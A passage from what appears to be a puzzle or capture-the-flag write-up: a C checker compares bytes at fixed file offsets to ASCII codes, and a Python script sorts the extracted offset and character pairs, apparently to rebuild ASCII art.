<span>fseek</span>(fp,<span>544</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>95</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>518</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>47</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>154</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>95</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>64</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>482</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>124</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>437</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>473</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>506</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>39</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>658</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>460</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>689</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>46</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>630</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>659</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>560</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>537</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>124</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>106</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>37</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>95</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>476</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>45</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>360</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>669</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>92</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>217</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>124</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>122</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>124</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>562</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>67</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>95</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>375</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>212</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>45</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>373</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>124</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>332</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>310</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>180</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>210</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>483</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>692</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>121</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>124</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>230</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>124</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>555</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>236</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>45</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>129</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>439</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>103</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>10</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>420</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>45</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>599</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>95</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>487</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>45</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>644</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>682</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>647</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>712</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>85</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>46</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>390</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>133</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>261</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>449</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>631</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>459</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>92</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>401</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>87</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>78</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>95</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>686</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>699</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>432</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>45</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>366</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>371</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>484</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>587</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>92</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>221</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>45</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>582</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>95</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>343</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>124</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>368</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>623</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>10</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>725</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>3</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>95</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>470</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>627</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>211</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>46</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>353</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>246</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>380</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>531</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>95</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>608</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>95</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>571</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>233</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>124</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>433</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>46</span>){<span>oops</span>();} <span>printf</span>(<span><span>"</span>CORRECT!<span>\n</span><span>"</span></span>); <span>fclose</span>(fp); <span>return</span>(<span>0</span>); }</div></details>Using VIM, I easily take the number out from this file, but it's not sorted(Recommend you use VIM, VIM is powerful)So, I wrote a short script to sort<details><summary> Script (Python3) </summary><div class="highlight highlight-source-python notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content=" list=[[540,"32"],[711,"32"],[73,"95"],[68,"95"],[155,"95"],[673,"32"],[35,"95"],[309,"124"],[148,"32"],[280,"124"],[474,"96"],[240,"32"],[178,"32"],[340,"32"],[695,"32"],[526,"95"],[286,"32"],[313,"32"],[259,"95"],[543,"95"],[256,"32"],[584,"32"],[97,"95"],[55,"32"],[0,"32"],[22,"95"],[615,"47"],[300,"45"],[30,"46"],[634,"32"],[676,"32"],[298,"46"],[428,"96"],[250,"32"],[93,"95"],[505,"32"],[556,"32"],[586,"32"],[697,"32"],[496,"124"],[222,"45"],[720,"32"],[324,"124"],[501,"124"],[361,"32"],[44,"95"],[442,"32"],[683,"32"],[306,"124"],[567,"95"],[118,"32"],[610,"95"],[197,"32"],[702,"32"],[326,"32"],[61,"95"],[374,"32"],[355,"47"],[493,"124"],[279,"32"],[4,"95"],[80,"32"],[116,"32"],[317,"32"],[668,"95"],[618,"124"],[435,"32"],[666,"92"],[268,"32"],[458,"32"],[20,"95"],[248,"32"],[111,"32"],[120,"32"],[574,"32"],[651,"32"],[228,"45"],[486,"45"],[23,"95"],[316,"32"],[341,"32"],[92,"95"],[98,"95"],[130,"32"],[183,"32"],[281,"32"],[38,"95"],[29,"95"],[335,"32"],[454,"32"],[715,"32"],[19,"95"],[636,"32"],[357,"32"],[705,"32"],[504,"32"],[275,"32"],[147,"32"],[173,"124"],[299,"45"],[239,"124"],[104,"124"],[591,"95"],[641,"32"],[708,"32"],[421,"45"],[477,"39"],[49,"95"],[548,"32"],[114,"47"],[82,"32"],[254,"124"],[617,"32"],[345,"32"],[251,"32"],[399,"124"],[163,"95"],[598,"95"],[377,"32"],[6,"95"],[203,"32"],[213,"45"],[270,"32"],[664,"32"],[438,"124"],[45,"95"],[329,"32"],[655,"32"],[667,"95"],[191,"124"],[387,"124"],[242,"124"],[436,"32"],[707,"32"],[423,"32"],[409,"32"],[237,"45"],[31,"32"],[205,"32"],[592,"95"],[238,"96"],[21,"95"],[706,"32"],[27,"95"],[188,"32"],[645,"32"],[450,"124"],[596,"32"],[716,"32"],[402,"124"],[186,"124"],[430,"45"],[429,"45"],[158,"124"],[100,"32"],[24,"95"],[274,"124"],[572,"32"],[652,"32"],[209,"32"],[475,"45"],[199,"92"],[57,"95"],[633,"32"],[315,"124"],[512,"124"],[499,"32"],[622,"32"],[558,"32"],[232,"32"],[177,"32"],[718,"32"],[396,"32"],[576,"92"],[681,"32"],[36,"95"],[422,"39"],[272,"124"],[654,"32"],[319,"32"],[137,"32"],[172,"32"],[65,"32"],[523,"95"],[235,"45"],[95,"32"],[142,"95"],[252,"124"],[611,"95"],[124,"32"],[206,"32"],[462,"124"],[492,"32"],[88,"95"],[143,"124"],[709,"32"],[382,"32"],[703,"32"],[367,"124"],[542,"124"],[66,"32"],[296,"32"],[321,"124"],[485,"96"],[262,"32"],[54,"32"],[102,"32"],[521,"95"],[208,"124"],[115,"32"],[338,"32"],[194,"32"],[215,"32"],[534,"95"],[189,"124"],[378,"124"],[151,"32"],[204,"92"],[339,"32"],[406,"32"],[719,"32"],[364,"124"],[202,"32"],[465,"124"],[388,"32"],[491,"124"],[457,"32"],[69,"32"],[710,"32"],[60,"95"],[589,"95"],[86,"32"],[99,"95"],[348,"95"],[334,"124"],[632,"32"],[444,"32"],[466,"32"],[639,"32"],[159,"32"],[497,"92"],[161,"32"],[635,"32"],[365,"32"],[325,"32"],[323,"32"],[295,"124"],[662,"32"],[500,"32"],[691,"32"],[551,"124"],[223,"45"],[284,"32"],[176,"124"],[198,"32"],[575,"32"],[224,"45"],[156,"95"],[84,"95"],[563,"32"],[363,"95"],[637,"32"],[278,"32"],[550,"32"],[650,"32"],[557,"32"],[167,"92"],[58,"95"],[89,"95"],[308,"32"],[2,"95"],[426,"32"],[469,"32"],[568,"95"],[601,"32"],[190,"32"],[322,"32"],[174,"32"],[372,"32"],[602,"92"],[303,"32"],[690,"32"],[276,"32"],[241,"32"],[404,"32"],[569,"124"],[234,"45"],[507,"45"],[411,"92"],[612,"95"],[253,"32"],[726,"32"],[381,"124"],[536,"95"],[227,"45"],[119,"32"],[403,"32"],[50,"95"],[328,"32"],[717,"32"],[56,"32"],[34,"95"],[107,"32"],[607,"124"],[184,"92"],[291,"32"],[410,"32"],[580,"95"],[383,"32"],[153,"32"],[578,"95"],[541,"32"],[283,"124"],[247,"32"],[346,"32"],[533,"95"],[146,"47"],[386,"32"],[201,"92"],[301,"46"],[135,"124"],[678,"32"],[293,"124"],[5,"95"],[588,"95"],[687,"32"],[606,"32"],[640,"32"],[577,"95"],[16,"95"],[126,"32"],[285,"124"],[418,"32"],[594,"47"],[77,"46"],[347,"95"],[11,"95"],[185,"32"],[370,"124"],[249,"124"],[331,"32"],[83,"95"],[675,"32"],[9,"32"],[445,"32"],[10,"32"],[171,"32"],[76,"32"],[539,"32"],[573,"32"],[448,"32"],[495,"32"],[661,"32"],[419,"39"],[724,"47"],[51,"95"],[145,"32"],[47,"95"],[722,"95"],[220,"44"],[289,"92"],[79,"95"],[397,"124"],[128,"32"],[671,"32"],[53,"95"],[110,"32"],[616,"32"],[434,"32"],[665,"32"],[166,"32"],[131,"32"],[516,"32"],[379,"32"],[369,"32"],[168,"32"],[271,"32"],[629,"32"],[40,"32"],[621,"124"],[32,"95"],[427,"32"],[677,"32"],[517,"32"],[600,"124"],[547,"32"],[105,"32"],[653,"32"],[265,"32"],[553,"95"],[663,"32"],[565,"32"],[244,"95"],[255,"32"],[304,"124"],[524,"95"],[609,"95"],[590,"95"],[169,"32"],[527,"95"],[389,"124"],[546,"32"],[424,"32"],[136,"32"],[425,"124"],[549,"32"],[307,"32"],[226,"96"],[13,"95"],[693,"32"],[349,"124"],[1,"95"],[525,"95"],[342,"32"],[522,"95"],[292,"32"],[71,"32"],[694,"32"],[559,"32"],[613,"95"],[337,"124"],[685,"32"],[552,"95"],[480,"124"],[391,"32"],[519,"10"],[417,"32"],[356,"32"],[561,"124"],[318,"124"],[311,"10"],[207,"10"],[33,"95"],[684,"32"],[187,"32"],[464,"32"],[447,"124"],[670,"32"],[498,"32"],[333,"32"],[443,"32"],[302,"32"],[170,"124"],[453,"32"],[352,"47"],[605,"124"],[508,"45"],[28,"95"],[25,"95"],[619,"32"],[15,"95"],[26,"95"],[264,"32"],[359,"32"],[144,"32"],[479,"32"],[219,"32"],[471,"124"],[74,"95"],[134,"124"],[413,"32"],[165,"32"],[721,"47"],[400,"32"],[96,"32"],[258,"95"],[392,"46"],[327,"32"],[90,"95"],[656,"32"],[530,"92"],[393,"32"],[109,"32"],[488,"39"],[581,"95"],[63,"32"],[414,"92"],[700,"32"],[597,"124"],[446,"32"],[149,"47"],[312,"124"],[62,"95"],[288,"32"],[456,"92"],[603,"95"],[243,"95"],[463,"32"],[192,"32"],[17,"32"],[132,"32"],[461,"32"],[625,"32"],[193,"32"],[412,"32"],[42,"32"],[196,"32"],[182,"32"],[478,"32"],[394,"96"],[579,"95"],[688,"32"],[245,"32"],[8,"32"],[657,"32"],[535,"95"],[509,"39"],[344,"32"],[330,"32"],[595,"32"],[81,"32"],[649,"32"],[267,"32"],[140,"95"],[127,"32"],[395,"32"],[481,"32"],[336,"32"],[490,"32"],[218,"32"],[175,"32"],[200,"32"],[362,"95"],[554,"124"],[157,"95"],[91,"95"],[723,"95"],[266,"124"],[513,"32"],[231,"32"],[160,"47"],[452,"32"],[376,"124"],[467,"32"],[195,"32"],[604,"95"],[660,"32"],[416,"124"],[108,"32"],[672,"32"],[179,"124"],[405,"124"],[52,"95"],[18,"46"],[59,"95"],[642,"32"],[123,"32"],[638,"32"],[14,"95"],[564,"124"],[624,"32"],[511,"32"],[545,"124"],[566,"124"],[314,"32"],[704,"32"],[528,"47"],[472,"32"],[408,"124"],[520,"124"],[305,"32"],[225,"39"],[139,"95"],[294,"32"],[75,"32"],[138,"32"],[385,"32"],[441,"124"],[216,"32"],[503,"124"],[150,"124"],[538,"32"],[646,"32"],[674,"32"],[570,"32"],[164,"95"],[628,"32"],[41,"32"],[431,"45"],[117,"32"],[70,"32"],[489,"32"],[593,"95"],[451,"32"],[263,"124"],[510,"32"],[350,"32"],[290,"124"],[72,"32"],[583,"47"],[43,"95"],[713,"32"],[643,"32"],[415,"10"],[532,"95"],[696,"32"],[679,"32"],[514,"32"],[620,"32"],[384,"124"],[229,"45"],[181,"124"],[515,"47"],[214,"46"],[277,"124"],[585,"32"],[354,"32"],[614,"95"],[407,"32"],[39,"32"],[113,"32"],[257,"124"],[358,"124"],[502,"32"],[12,"95"],[698,"32"],[282,"32"],[351,"32"],[94,"95"],[529,"32"],[320,"32"],[162,"32"],[714,"32"],[112,"92"],[101,"32"],[468,"32"],[297,"32"],[269,"124"],[701,"32"],[152,"32"],[494,"32"],[273,"32"],[398,"32"],[287,"32"],[260,"32"],[7,"95"],[141,"95"],[440,"32"],[626,"32"],[48,"95"],[648,"32"],[680,"32"],[125,"32"],[455,"32"],[544,"95"],[518,"47"],[154,"95"],[64,"32"],[482,"124"],[437,"32"],[473,"32"],[506,"39"],[658,"32"],[460,"32"],[689,"32"],[46,"32"],[630,"32"],[659,"32"],[560,"32"],[537,"124"],[106,"32"],[37,"95"],[476,"45"],[360,"32"],[669,"92"],[217,"124"],[122,"124"],[562,"32"],[67,"95"],[375,"32"],[212,"45"],[373,"124"],[332,"32"],[310,"32"],[180,"32"],[210,"32"],[483,"32"],[692,"32"],[121,"124"],[230,"124"],[555,"32"],[236,"45"],[129,"32"],[439,"32"],[103,"10"],[420,"45"],[599,"95"],[487,"45"],[644,"32"],[682,"32"],[647,"32"],[712,"32"],[85,"46"],[390,"32"],[133,"32"],[261,"32"],[449,"32"],[631,"32"],[459,"92"],[401,"32"],[87,"32"],[78,"95"],[686,"32"],[699,"32"],[432,"45"],[366,"32"],[371,"32"],[484,"32"],[587,"92"],[221,"45"],[582,"95"],[343,"124"],[368,"32"],[623,"10"],[725,"32"],[3,"95"],[470,"32"],[627,"32"],[211,"46"],[353,"32"],[246,"32"],[380,"32"],[531,"95"],[608,"95"],[571,"32"],[233,"124"],[433,"46"]] list = sorted(list) for i in list: print(i)"> <span>list</span><span>=</span>[[<span>540</span>,<span>"32"</span>],[<span>711</span>,<span>"32"</span>],[<span>73</span>,<span>"95"</span>],[<span>68</span>,<span>"95"</span>],[<span>155</span>,<span>"95"</span>],[<span>673</span>,<span>"32"</span>],[<span>35</span>,<span>"95"</span>],[<span>309</span>,<span>"124"</span>],[<span>148</span>,<span>"32"</span>],[<span>280</span>,<span>"124"</span>],[<span>474</span>,<span>"96"</span>],[<span>240</span>,<span>"32"</span>],[<span>178</span>,<span>"32"</span>],[<span>340</span>,<span>"32"</span>],[<span>695</span>,<span>"32"</span>],[<span>526</span>,<span>"95"</span>],[<span>286</span>,<span>"32"</span>],[<span>313</span>,<span>"32"</span>],[<span>259</span>,<span>"95"</span>],[<span>543</span>,<span>"95"</span>],[<span>256</span>,<span>"32"</span>],[<span>584</span>,<span>"32"</span>],[<span>97</span>,<span>"95"</span>],[<span>55</span>,<span>"32"</span>],[<span>0</span>,<span>"32"</span>],[<span>22</span>,<span>"95"</span>],[<span>615</span>,<span>"47"</span>],[<span>300</span>,<span>"45"</span>],[<span>30</span>,<span>"46"</span>],[<span>634</span>,<span>"32"</span>],[<span>676</span>,<span>"32"</span>],[<span>298</span>,<span>"46"</span>],[<span>428</span>,<span>"96"</span>],[<span>250</span>,<span>"32"</span>],[<span>93</span>,<span>"95"</span>],[<span>505</span>,<span>"32"</span>],[<span>556</span>,<span>"32"</span>],[<span>586</span>,<span>"32"</span>],[<span>697</span>,<span>"32"</span>],[<span>496</span>,<span>"124"</span>],[<span>222</span>,<span>"45"</span>],[<span>720</span>,<span>"32"</span>],[<span>324</span>,<span>"124"</span>],[<span>501</span>,<span>"124"</span>],[<span>361</span>,<span>"32"</span>],[<span>44</span>,<span>"95"</span>],[<span>442</span>,<span>"32"</span>],[<span>683</span>,<span>"32"</span>],[<span>306</span>,<span>"124"</span>],[<span>567</span>,<span>"95"</span>],[<span>118</span>,<span>"32"</span>],[<span>610</span>,<span>"95"</span>],[<span>197</span>,<span>"32"</span>],[<span>702</span>,<span>"32"</span>],[<span>326</span>,<span>"32"</span>],[<span>61</span>,<span>"95"</span>],[<span>374</span>,<span>"32"</span>],[<span>355</span>,<span>"47"</span>],[<span>493</span>,<span>"124"</span>],[<span>279</span>,<span>"32"</span>],[<span>4</span>,<span>"95"</span>],[<span>80</span>,<span>"32"</span>],[<span>116</span>,<span>"32"</span>],[<span>317</span>,<span>"32"</span>],[<span>668</span>,<span>"95"</span>],[<span>618</span>,<span>"124"</span>],[<span>435</span>,<span>"32"</span>],[<span>666</span>,<span>"92"</span>],[<span>268</span>,<span>"32"</span>],[<span>458</span>,<span>"32"</span>],[<span>20</span>,<span>"95"</span>],[<span>248</span>,<span>"32"</span>],[<span>111</span>,<span>"32"</span>],[<span>120</span>,<span>"32"</span>],[<span>574</span>,<span>"32"</span>],[<span>651</span>,<span>"32"</span>],[<span>228</span>,<span>"45"</span>],[<span>486</span>,<span>"45"</span>],[<span>23</span>,<span>"95"</span>],[<span>316</span>,<span>"32"</span>],[<span>341</span>,<span>"32"</span>],[<span>92</span>,<span>"95"</span>],[<span>98</span>,<span>"95"</span>],[<span>130</span>,<span>"32"</span>],[<span>183</span>,<span>"32"</span>],[<span>281</span>,<span>"32"</span>],[<span>38</span>,<span>"95"</span>],[<span>29</span>,<span>"95"</span>],[<span>335</span>,<span>"32"</span>],[<span>454</span>,<span>"32"</span>],[<span>715</span>,<span>"32"</span>],[<span>19</span>,<span>"95"</span>],[<span>636</span>,<span>"32"</span>],[<span>357</span>,<span>"32"</span>],[<span>705</span>,<span>"32"</span>],[<span>504</span>,<span>"32"</span>],[<span>275</span>,<span>"32"</span>],[<span>147</span>,<span>"32"</span>],[<span>173</span>,<span>"124"</span>],[<span>299</span>,<span>"45"</span>],[<span>239</span>,<span>"124"</span>],[<span>104</span>,<span>"124"</span>],[<span>591</span>,<span>"95"</span>],[<span>641</span>,<span>"32"</span>],[<span>708</span>,<span>"32"</span>],[<span>421</span>,<span>"45"</span>],[<span>477</span>,<span>"39"</span>],[<span>49</span>,<span>"95"</span>],[<span>548</span>,<span>"32"</span>],[<span>114</span>,<span>"47"</span>],[<span>82</span>,<span>"32"</span>],[<span>254</span>,<span>"124"</span>],[<span>617</span>,<span>"32"</span>],[<span>345</span>,<span>"32"</span>],[<span>251</span>,<span>"32"</span>],[<span>399</span>,<span>"124"</span>],[<span>163</span>,<span>"95"</span>],[<span>598</span>,<span>"95"</span>],[<span>377</span>,<span>"32"</span>],[<span>6</span>,<span>"95"</span>],[<span>203</span>,<span>"32"</span>],[<span>213</span>,<span>"45"</span>],[<span>270</span>,<span>"32"</span>],[<span>664</span>,<span>"32"</span>],[<span>438</span>,<span>"124"</span>],[<span>45</span>,<span>"95"</span>],[<span>329</span>,<span>"32"</span>],[<span>655</span>,<span>"32"</span>],[<span>667</span>,<span>"95"</span>],[<span>191</span>,<span>"124"</span>],[<span>387</span>,<span>"124"</span>],[<span>242</span>,<span>"124"</span>],[<span>436</span>,<span>"32"</span>],[<span>707</span>,<span>"32"</span>],[<span>423</span>,<span>"32"</span>],[<span>409</span>,<span>"32"</span>],[<span>237</span>,<span>"45"</span>],[<span>31</span>,<span>"32"</span>],[<span>205</span>,<span>"32"</span>],[<span>592</span>,<span>"95"</span>],[<span>238</span>,<span>"96"</span>],[<span>21</span>,<span>"95"</span>],[<span>706</span>,<span>"32"</span>],[<span>27</span>,<span>"95"</span>],[<span>188</span>,<span>"32"</span>],[<span>645</span>,<span>"32"</span>],[<span>450</span>,<span>"124"</span>],[<span>596</span>,<span>"32"</span>],[<span>716</span>,<span>"32"</span>],[<span>402</span>,<span>"124"</span>],[<span>186</span>,<span>"124"</span>],[<span>430</span>,<span>"45"</span>],[<span>429</span>,<span>"45"</span>],[<span>158</span>,<span>"124"</span>],[<span>100</span>,<span>"32"</span>],[<span>24</span>,<span>"95"</span>],[<span>274</span>,<span>"124"</span>],[<span>572</span>,<span>"32"</span>],[<span>652</span>,<span>"32"</span>],[<span>209</span>,<span>"32"</span>],[<span>475</span>,<span>"45"</span>],[<span>199</span>,<span>"92"</span>],[<span>57</span>,<span>"95"</span>],[<span>633</span>,<span>"32"</span>],[<span>315</span>,<span>"124"</span>],[<span>512</span>,<span>"124"</span>],[<span>499</span>,<span>"32"</span>],[<span>622</span>,<span>"32"</span>],[<span>558</span>,<span>"32"</span>],[<span>232</span>,<span>"32"</span>],[<span>177</span>,<span>"32"</span>],[<span>718</span>,<span>"32"</span>],[<span>396</span>,<span>"32"</span>],[<span>576</span>,<span>"92"</span>],[<span>681</span>,<span>"32"</span>],[<span>36</span>,<span>"95"</span>],[<span>422</span>,<span>"39"</span>],[<span>272</span>,<span>"124"</span>],[<span>654</span>,<span>"32"</span>],[<span>319</span>,<span>"32"</span>],[<span>137</span>,<span>"32"</span>],[<span>172</span>,<span>"32"</span>],[<span>65</span>,<span>"32"</span>],[<span>523</span>,<span>"95"</span>],[<span>235</span>,<span>"45"</span>],[<span>95</span>,<span>"32"</span>],[<span>142</span>,<span>"95"</span>],[<span>252</span>,<span>"124"</span>],[<span>611</span>,<span>"95"</span>],[<span>124</span>,<span>"32"</span>],[<span>206<